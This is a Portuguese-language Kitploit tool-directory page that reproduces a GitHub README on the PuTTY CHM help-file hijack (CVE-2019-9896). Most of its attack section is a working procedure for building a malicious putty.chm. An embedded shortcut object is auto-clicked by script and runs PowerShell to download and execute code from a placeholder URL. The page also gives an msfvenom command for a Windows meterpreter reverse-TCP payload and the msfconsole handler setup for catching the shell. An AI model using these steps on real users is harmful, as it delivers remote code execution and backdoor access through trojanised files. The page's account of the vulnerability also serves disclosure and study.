Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vuln-chm-hijack — Potencial execução de código malicioso via sequestro de CHM (CVE-2019-9896) | Kitploit
Ferramentas/GitHubGitHub/yasinyilmaz/vuln-chm-hijack
Ferramentas de PhishingGeração de PayloadsExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubyasinyilmaz/vuln-chm-hijack

vuln-chm-hijack

Potencial execução de código malicioso via sequestro de CHM (CVE-2019-9896)

Ver Repositório
79há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidade PuTTY vuln-chm-hijack

Potencial execução de código malicioso via sequestro de CHM

Sobre

Até e incluindo a versão 0.70, quando você iniciava a ajuda online em qualquer uma das ferramentas GUI do PuTTY para Windows, a ferramenta localizava seu arquivo de ajuda procurando ao lado de seu próprio executável.

Se você estivesse executando o PuTTY de um diretório onde código não relacionado pudesse organizar a colocação de arquivos (por exemplo, executando-o diretamente do diretório de download padrão do navegador), isso significa que se alguém conseguisse colocar um arquivo chamado putty.chm nesse diretório (por exemplo, atraindo você a clicar em um link de download com esse nome), então o PuTTY acreditaria que era o arquivo de ajuda real e o passaria para htmlhelp.exe.

Isso é uma vulnerabilidade porque arquivos de Ajuda HTML (.chm) podem, por sua vez, organizar a execução de código de sua escolha, por exemplo, incorporando um elemento HTML que é um atalho do Windows, além de Javascript para clicá-lo.

Mais detalhes: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html

O que é arquivo CHM?

CHM é uma extensão para o formato de arquivo HTML Compilado, mais comumente usado pelo programa de ajuda baseado em HTML da Microsoft. Pode conter muitos documentos HTML compactados e as imagens e JavaScript aos quais eles vinculam. Os recursos do CHM incluem sumário, índice e pesquisa de texto completo.

Isso foi usado antes?

No passado, agentes de ameaças usavam arquivos CHM para soltar o arquivo backdoor, que é comumente usado em ataques direcionados.

Alguns exemplos:

https://www.bleepingcomputer.com/news/security/malicious-chm-files-being-used-to-install-brazilian-banking-trojans/ https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/

Procedimento para gerar arquivo CHM malicioso

Precisamos do toolkit HTML Help Workshop para criar um arquivo CHM. Após a instalação, inicie a ferramenta HTML Help Workshop.

Passos

Clique em File > New > Project e siga os passos abaixo:

Criando Projeto HTML Help

  1. Tela de Novo Projeto > Next > Browse

  2. Especifique o nome do seu arquivo de projeto e onde você gostaria que ele fosse criado.

Preencha o Nome do arquivo: putty e clique em "Open"

Especifique seu Projeto HTML Help

  1. Se você já criou um arquivo HTML que deseja incluir em seu projeto.

Selecione arquivos HTML (.htm)

Especifique onde seus arquivos .htm estão localizados.

Botão Add.. e selecione um diretório já criado para o exploit conter seu arquivo malicioso, como putty.htm

Selecione um arquivo HTM

  1. O assistente cria um novo Projeto HTML Help. Precisamos fazer alterações.

  2. Na ferramenta, clique duas vezes no htm criado para editá-lo, depois insira o código abaixo para criar um arquivo de Ajuda básico:

root@kitploit:~
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<meta name="GENERATOR" content="Microsoft&reg; HTML Help Workshop 4.1">
<Title>putty</Title>
</HEAD>
<BODY>


</BODY>
</HTML>

  1. Agora, criamos um objeto botão que inicia o exe malicioso quando clicado. Além do objeto, também adicionamos uma parte de script que clicará no botão automaticamente quando o documento for aberto:
root@kitploit:~
<html>
<title> PuTTY Help </title>
<head>
</head>
<body>

<OBJECT id=shortcut classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -NoProfile -WindowsStyle 1 -c -IEX (New-Object Net.WebClient).DownloadString('{YOUR MALICIOUS FILE URL}')">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
shortcut.Click();
</SCRIPT>

<h2 align=center> PuTTY CHM </h2>
<p><h3 align=center> Welcome! </h3></p>
</body>
</html>

Criar arquivo malicioso

  1. O comando PowerShell irá conectar-se à URL remota listada e executar o meterpreter que o site responder. Este script remoto pode ser outro script PowerShell (.ps) ou Payload Meterpreter para Windows.

Como crio um Payload TCP Meterpreter simples para Windows?

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST={YOUR IP} LPORT={PORT } -f exe > malware.exe

Quando você clica duas vezes no botão Ajuda, um putty.exe é gerado como filho de malware.exe, que é o interpretador do arquivo binário CHM. (Seus arquivos maliciosos putty.chm e putty.exe devem estar no mesmo diretório)

Gera um malware

Como obtenho o shell meterpreter?

root@kitploit:~
msfconsole 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost {YOUR IP}
lhost => {YOUR IP}
msf exploit(multi/handler) > set lport {PORT}
lport => {PORT}
msf exploit(multi/handler) > run

Recursos:

  1. https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-chm-hijack.html
  2. https://safe-cyberdefense.com/hide-malware-microsoft-html-interpretors/

Baixar ferramenta